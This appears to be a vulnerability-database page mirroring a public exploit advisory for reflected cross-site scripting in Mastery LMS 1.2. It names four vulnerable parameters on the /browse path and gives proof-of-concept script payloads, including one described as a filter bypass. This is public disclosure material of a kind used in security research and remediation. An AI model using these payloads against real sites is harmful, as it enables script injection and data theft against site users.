Lucene search
K

Mastery LMS 1.2 Cross Site Scripting

🗓️ 11 Jul 2023 00:00:00Reported by CraCkErType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 241 Views

Mastery LMS 1.2 Cross Site Scripting vulnerability on browse path

Code
`# Exploit Title: Mastery LMS 1.2 - Reflected XSS  
# Exploit Author: CraCkEr  
# Date: 09/07/2023  
# Vendor: Creativeitem  
# Vendor Homepage: https://creativeitem.com/  
# Software Link: https://demo.creativeitem.com/mastery/  
# Tested on: Windows 10 Pro  
# Impact: Manipulate the content of the site   
  
  
  
## Description  
  
Allow Attacker to inject malicious code into website, give ability to steal sensitive  
information, manipulate data, and launch additional attacks.  
  
  
  
Path: /browse  
  
GET parameter 'search' is vulnerable to XSS  
  
https://website/browse?search=[XSS]  
  
GET parameter 'featured' is vulnerable to XSS  
  
https://website/browse?featured=[XSS]  
  
GET parameter 'recommended' is vulnerable to XSS  
  
https://website/browse?recommended=[XSS]  
  
GET parameter 'skill' is vulnerable to XSS  
  
https://website/browse?skill=[XSS]  
  
  
Simple XSS Payload (Blocked by WAF) : <script>alert(1)</script>   
XSS Filter Bypass : "><script>alert(1)</script>  
  
  
[-] Done  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation